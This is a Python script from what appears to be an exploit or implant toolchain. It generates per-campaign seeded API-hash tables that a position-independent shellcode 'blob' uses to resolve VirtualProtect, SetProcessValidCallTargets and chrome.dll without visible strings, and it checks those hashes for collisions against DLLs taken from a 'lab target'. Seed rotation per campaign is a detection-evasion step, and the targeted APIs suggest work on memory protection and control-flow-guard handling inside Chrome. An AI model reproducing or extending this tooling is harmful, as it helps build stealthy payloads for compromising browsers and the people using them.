#!/usr/bin/env python3
"""hash.py — per-campaign seeded API-hash table generator + collision audit.

The blob resolves modules and exports by dual-32 hashes (seeded FNV-1a +
seeded DJB2, one pass over the name).  This script is the single source
of truth for the constants:

    python3 scripts/hash.py --emit    -> include/pic_hash_table.h
    python3 scripts/hash.py --audit   -> collision audit vs pinned DLLs

Rotating the campaign identity = edit scripts/hash_seed, rerun --emit,
rebuild.  Seeds stay 32-bit on purpose: every constant materializes as
imm32 (no movabs), keeping the raw gate green.

Hash semantics (must mirror src/resolve.c exactly):
  - ASCII names: per byte, a-z folded to A-Z first;
      fnv ^= b; fnv *= 16777619;
      djb  = (djb << 5) + djb + b;
  - UTF-16 module names: per code unit (folded), low byte then high byte,
    each byte mixed through both accumulators as above.

Audit map (module -> exports we resolve from it):
  kernel32.dll    -> VirtualQuery, GetTickCount, VirtualProtect, GetLastError
  kernelbase.dll  -> SetProcessValidCallTargets

For the optional collision audit, place pinned system DLLs in a local
Windows box; they must match the deployment target's build) and run
--audit.  A PASS means: in that DLL's full export table, exactly one
name carries the target hash pair, and it is the intended name.
"""

import json
import pathlib
import struct
import sys

ROOT = pathlib.Path(__file__).resolve().parent.parent
sys.path.insert(0, str(ROOT / "scripts"))

FNV_PRIME = 16777619
MASK = 0xFFFFFFFF

# ---------------------------------------------------------------- hashing


def fold(b: int) -> int:
    return b - 0x20 if 0x61 <= b <= 0x7A else b


def hash_ascii(name: str, fnv_seed: int, djb_seed: int):
    f, d = fnv_seed, djb_seed
    for ch in name.encode("ascii"):
        b = fold(ch)
        f = ((f ^ b) * FNV_PRIME) & MASK
        d = ((d << 5) + d + b) & MASK
    return f, d


def hash_utf16(name: str, fnv_seed: int, djb_seed: int):
    f, d = fnv_seed, djb_seed
    for unit in (ord(c) for c in name):
        if 0x61 <= unit <= 0x7A:
            unit -= 0x20
        for b in (unit & 0xFF, (unit >> 8) & 0xFF):
            f = ((f ^ b) * FNV_PRIME) & MASK
            d = ((d << 5) + d + b) & MASK
    return f, d


MODULES = ["chrome.dll", "kernel32.dll", "kernelbase.dll"]
EXPORTS = [
    "VirtualQuery",
    "GetTickCount",
    "VirtualProtect",
    "GetLastError",
    "SetProcessValidCallTargets",
]

AUDIT_MAP = {
    "kernel32.dll": ["VirtualQuery", "GetTickCount", "VirtualProtect", "GetLastError"],
    "kernelbase.dll": ["SetProcessValidCallTargets"],
}
AUDIT_DLL_PATHS = {
    "kernel32.dll": ROOT / "sysdlls/kernel32.dll",
    "kernelbase.dll": ROOT / "sysdlls/kernelbase.dll",
}


def load_seeds():
    cfg = json.loads((ROOT / "scripts/hash_seed").read_text())
    return int(cfg["fnv_seed"], 16), int(cfg["djb_seed"], 16), cfg["campaign"]


def symbol(name: str) -> str:
    return "".join(p.upper() if p in ("dll",) else p.capitalize() for p in name.split("_"))


# ----------------------------------------------------------------- emit


def emit():
    fs, ds, campaign = load_seeds()
    lines = [
        "/* generated by scripts/hash.py --emit from scripts/hash_seed",
        f" * campaign: {campaign} — do not edit; rotate via the seed file */",
        "#ifndef PIC_HASH_TABLE_H",
        "#define PIC_HASH_TABLE_H",
        "",
        "#define PIC_HASH_SEED_FNV 0x%08Xu" % fs,
        "#define PIC_HASH_SEED_DJB 0x%08Xu" % ds,
        "",
        "/* PIC_HASH initializers: {fnv, djb} */",
    ]
    for m in MODULES:
        f, d = hash_utf16(m, fs, ds)
        sym = "MARGARET_MODULE_HASH_" + m.replace(".", "_").upper()
        lines.append(f"#define {sym} {{0x{f:08X}u, 0x{d:08X}u}}")
    for e in EXPORTS:
        f, d = hash_ascii(e, fs, ds)
        sym = "MARGARET_HASH_" + e.upper()
        lines.append(f"#define {sym} {{0x{f:08X}u, 0x{d:08X}u}}")
    lines += ["", "#endif /* PIC_HASH_TABLE_H */", ""]
    out = ROOT / "include/pic_hash_table.h"
    out.write_text("\n".join(lines))
    print(f"emitted {out} (campaign {campaign})")


# ---------------------------------------------------------------- audit


def enumerate_exports(blob: bytes, sections) -> list:
    """Return the export-name list of a PE given its raw bytes."""
    from chrome_pdb_id import parse_headers  # noqa: F401  (kept for symmetry)

    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    opt = e_lfanew + 0x18
    exp_rva = struct.unpack_from("<I", blob, opt + 0x70)[0]
    if exp_rva == 0:
        return []
    for s in sections:
        if s["virtual_address"] <= exp_rva < s["virtual_address"] + s["virtual_size"]:
            off = s["raw_pointer"] + (exp_rva - s["virtual_address"])
            break
    else:
        return []
    n_names = struct.unpack_from("<I", blob, off + 0x18)[0]
    names_rva = struct.unpack_from("<I", blob, off + 0x20)[0]
    for s in sections:
        if s["virtual_address"] <= names_rva < s["virtual_address"] + s["virtual_size"]:
            noff = s["raw_pointer"] + (names_rva - s["virtual_address"])
            break
    else:
        return []
    out = []
    for i in range(n_names):
        rva = struct.unpack_from("<I", blob, noff + i * 4)[0]
        for s in sections:
            if s["virtual_address"] <= rva < s["virtual_address"] + s["virtual_size"]:
                p = s["raw_pointer"] + (rva - s["virtual_address"])
                end = blob.index(b"\x00", p)
                out.append(blob[p:end].decode("ascii", errors="replace"))
                break
    return out


def audit():
    fs, ds, campaign = load_seeds()
    fail = False
    any_checked = False

    for dll, wanted in AUDIT_MAP.items():
        path = AUDIT_DLL_PATHS[dll]
        if not path.exists():
            print(f"[audit] {dll}: SKIP (missing {path}; copy from the lab target)")
            continue
        blob = path.read_bytes()
        from chrome_pdb_id import parse_headers

        sections = parse_headers(blob)["sections"]
        exports = enumerate_exports(blob, sections)
        print(f"[audit] {dll}: {len(exports)} exports")
        for name in wanted:
            f, d = hash_ascii(name, fs, ds)
            hits = [e for e in exports if hash_ascii(e, fs, ds) == (f, d)]
            if hits == [name]:
                print(f"  OK   {name} -> (0x{f:08X}, 0x{d:08X}) unique")
            else:
                print(f"  FAIL {name}: matches {hits}")
                fail = True
            any_checked = True

    if fail:
        print("[audit] RESULT: FAIL — rotate seeds and re-emit")
        return 1
    if not any_checked:
        print("[audit] RESULT: nothing checked — place DLLs under sysdlls/")
        return 1
    print(f"[audit] RESULT: PASS (campaign {campaign})")
    return 0


def main(argv):
    if "--emit" in argv:
        emit()
        return 0
    if "--audit" in argv:
        return audit()
    print(__doc__)
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
